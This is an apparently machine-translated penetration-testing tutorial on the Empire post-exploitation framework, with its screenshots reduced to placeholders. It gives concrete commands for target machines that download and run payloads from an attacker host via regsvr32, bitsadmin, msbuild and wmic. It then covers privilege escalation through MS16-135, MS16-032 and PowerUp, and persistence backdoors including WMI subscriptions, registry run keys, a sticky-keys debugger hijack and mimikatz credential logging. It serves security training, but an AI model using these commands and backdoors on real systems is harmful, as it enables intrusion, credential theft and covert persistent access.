Intranet penetration day15 Empire

Time:2020-11-20

Empire (usestager usage, authorization, persistence backdoor)

Premise of this chapter: the listener has been set up successfully (please refer to Article 14 of day for how to set up the listener)

1. Several usages of usestager

windows/launcher_sct:

Introduction: Regsvr32 command is used to register COM components. It is a command provided by Windows system to register or unload controls to the system. It runs in command line mode. Regsvr32.exe for WinXP and above systems is under Windows / system32 folder; regsvr32.exe for 2000 system is under WinNT / system32 folder.

Usage:regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

1) usestager windows/launcher_ SCT enters windows / launcher_ SCT module

wps1

2) Set the parameters

wps2

set Listener kali

set OutFile /var/www/html/xx.sct

3) Execute

wps3

4) Run Regsvr32 / U / N / S / I on the target aircraft http://192.168.227.129/xx.sct scrobj.dll

wps4

wps5

5) Successfully returned to session

wps6

windows/launcher_vbs:

Remote download:bitsadmin /transfer /n http://IP/xx.vbs path

1) usestager windows/launcher_ VBS enters windows / launcher_ VBS module

wps7

2) Set the parameters

wps8

3) Execute

wps9

4) Running on target

bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs

wps10

wps11

5) The target machine executed the. VBS file and successfully rebounded the session

wps12

windows/launcher_xml:

Msbuild is a free open source build tool set for managing native C + + code. Before visual studio 2013, msbuild was part of the. Net framework, but after that, msbuild was bound to visual studio. Therefore, visual studio relies on msbuild, but msbuild does not rely on visual studio.

Usage:Using msbuild in net4.0 to run shellcode injected XML file to rebound shell

1) As in the previous two operations, generate the XML file to the / var / www / HTML / folder

wps13

2) Download the file on the target

wps14

3) CD to C: windows on target\ Microsoft.NET \Framework64.0.30319 running XML using msbuild

wps15

4) Successfully rebounded session

wps16

windows/wmic:

Wmic extends WMI (Windows Management Instrumentation) to support system management from command line interface and batch command script.

Usage:wmic os get /format:”http://IP/xx.xsl”

1) As in the previous two steps, save the generated XSL to the HTML folder

wps17

2) Execute wmic OS get / format on the target“ http://192.168.227.129/xx.xsl “

wps18

3) Successfully rebounded session

wps19

2. Empire authorization module

UAC and bypass UAC are introduced in day14

Local delegation

Ms16-135: win32k information disclosure vulnerability

To exploit this vulnerability, an attacker must log on to the affected system and run a specially designed application. This security update fixes this vulnerability by correcting the way the windows kernel processes memory addresses.

Search module ms16-135 find ms16-135 module

wps20

Usemodule privec / ms16-135

wps21

Execute after setting parameters

wps22

Successfully rebounded session with privilege

wps23

Ms16-032: secondary login privilege escalation vulnerability

If the windows secondary login service fails to properly manage the request handle in memory, a privilege escalation vulnerability exists in Microsoft Windows. An attacker who successfully exploits this vulnerability can run arbitrary code as an administrator.

Usemodule privec / ms16-032

wps24

After setting the parameters, execute

wps25

Successfully returned a session with system privileges

wps26

wps27

PowerShell / privec / Sherlock to find windows local privilege upgrade vulnerability

Usemodule privec / Sherlock uses this module

wps28

Show vulnerability of local privilege escalation

wps29

Using powerup to raise rights

Powerup is a PowerShell tool that helps upgrade local privileges on Windows systems. It contains a variety of methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings and upgrade opportunities. It is part of powertools and is located in https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp 。 Empire implements the upgrade function of powerup in the privec / powerup / * module.

Usemodule privec / powerup / allchecks to detect whether powerup vulnerabilities can be exploited

wps30

Show vulnerability

wps31

Use the corresponding module according to the vulnerability

wps32

You can see that there are improperly configured permissions on the service executable (via the service_ exe_ *Use it)

But I’ve tried it all over here. It’s not very easy to use

3. The back door of persistence

PowerBreach

Introduction: powerbreak is a series of in memory PowerShell backdoors, which can provide triggers for various options.

persistence/powerbreach/deaduser– accepts the user name and the switch / flag on whether the user name is a domain name (relative to the local account). Every sleep seconds, the script checks whether the account still exists, and if not, triggers the staging logic. The backdoor does not require local administrator privileges.

Understanding: judge whether the user name you set exists (whether it has been renamed or deleted). When the name is changed, it will trigger the script to bounce shell

Use module persistence / powerbreak / deaduser

wps33

View the required parameters

wps34

Set related parameters

wps35

implement

wps36

Changed AAA to BBB

wps37

Shell successfully rebounded

wps38

persistence/powerbreach/eventlog-Event log – queries the security event log at intervals to find events with unique trigger values. Door doesAdministrator permission requiredTo access the security event log.

Usemodule persistence / powerbreak / eventlog * using modules

wps39

View the required parameters

wps40

Set related parameters

wps41

implement

wps42

Turn on the eventvwr of the target. When the “hacker” keyword (defined in the above parameters can be changed by yourself) exists in the security log

wps43

Successfully rebounded session

wps44

Because it is a backdoor left by administrator rights, the returned session also has administrator rights

wps45

persistence/powerbreach /resolver– the host name and trigger IP to be resolved. The script checks every sleep second whether the host name resolves to the trigger IP, otherwise the staging logic will be triggered. The backdoor does not require local administrator privileges.

Use module persistence / powerbreak / resolver

wps46

View the required parameters

wps47

Set related parameters

wps48

implement

wps49

Go to the target plane to visit 127.0.0.1 and ask him to analyze it

wps50

Shell successfully rebounded

wps51

Userland

persistence/userland/ *Module allows user mode, from restart persistence (i.e. no administrative permissions). If a listener is specified, the staging code for the Empire agent is automatically generated and used as the script logic for triggering.

Persistence / userland / registry – in HKCU:Software \Set a value in Microsoft / Windows / CurrentVersion / run to execute the script under any storage mechanism you choose. This will cause the script to run only if the user is logged in.

Use module persistence / userland / registry

wps52

View the required parameters

wps53

Set related parameters

wps54

implement

wps55

Log out of the target and log in again, and successfully return to the shell session (here, there will be a short power shell pop-up box when the user logs in)

wps56

persistence/userland/schtask– configure scheduled tasks to execute scripts with any storage mechanism selected. The script can be triggered in dailytime (HH: mm format) or after the user has idle idletime seconds

Understanding: This is the scheduled task in the registry

Use module persistence / userland / schtasks

wps57

View the required parameters

wps58

Set related parameters

wps59

implement

wps60

Log off the target and log in again. When the set time is up, return to the shell session successfully

wps61

Elevated

persistence/elevated/*Module allows restart persistence from elevated context (i.e. with administrative privileges). If a listener is specified, the staging code for the Empire agent is automatically generated and used as the script logic for triggering.

Understanding: This module is a backdoor with administrator rights

Persistence / upgraded / registry and persistence / upgraded / schtask are the same as the previous ones, except that administrator permissions are required

persistence/elevated/wmi– configure persistent WMI subscription to fire stored script logic. This script can be triggered when the system is started using either daily time (HH: mm format) or at startup. This has levels that are difficult to detect / remove.

Understanding: This is the scheduled task in the registry

Usemodule persistence / upgraded / WMI * using modules

wps62

View the required parameters

wps63

Set related parameters

wps64

implement

wps65

Verify the WMI on the target, and directly enter get wmiobject – namespace root / Subscription – class commandlineeventconsumer – Filter “name =’updater ‘” in the PowerShell

wps66

Restart the target and successfully rebound the shell with administrator permission

wps67

wps68

misc

persistence/misc/debugger*-In Empire 3.6.0, the persistence / debugger / * module is integrated into the persistence / misc / debugger * module. You can set image file execution options (also known as debugger) for various executable files that can be accessed before logging in at the RDP prompt. By default, the debugger is set to cmd.exe , which allows you to trigger a command prompt that runs as system through RDP without actually logging on to the computer. You can also use the binary parameter to specify the path to another binary. If you want the debugger to trigger the register, set the listener parameter. This generates a suitable register for the specified listener and stores it in the specified regpath. You can then trigger these staging procedures from the RDP prompt pre authentication, but note that once the RDP prompt is turned off (which occurs after 30 seconds of inactivity), the staging agent is killed.

Usemodule persistence / misc / debugger * using modules

wps69

View the required parameters

wps70

Setting parameters

wps71

implement

wps72

Press shift five times in the target win7 login interface, and a PowerShell box flashes by

wps73

Successfully returned to session with administrator rights

wps74

persistence/misc/memssp– install the memssp module of mimikatz, which should log off all authentication events to C: [windows / system32]\ mimisla.log 。 It should be rebooted for persistence.

Usemodule persistence / misc / memssp * using modules

wps75

Just run it directly

wps76

Target corresponding directory generated mimisla.log file

wps77

persistence/misc/disable_machine_acct_change– prevents the target from changing its computer account password. If you first run mimikatz / credentials / logonpasswords to dump the computer account password (the account ends in $), you should have persistent access to the given system. Cleanup options are also available.

After using this module, you can run it directly

wps78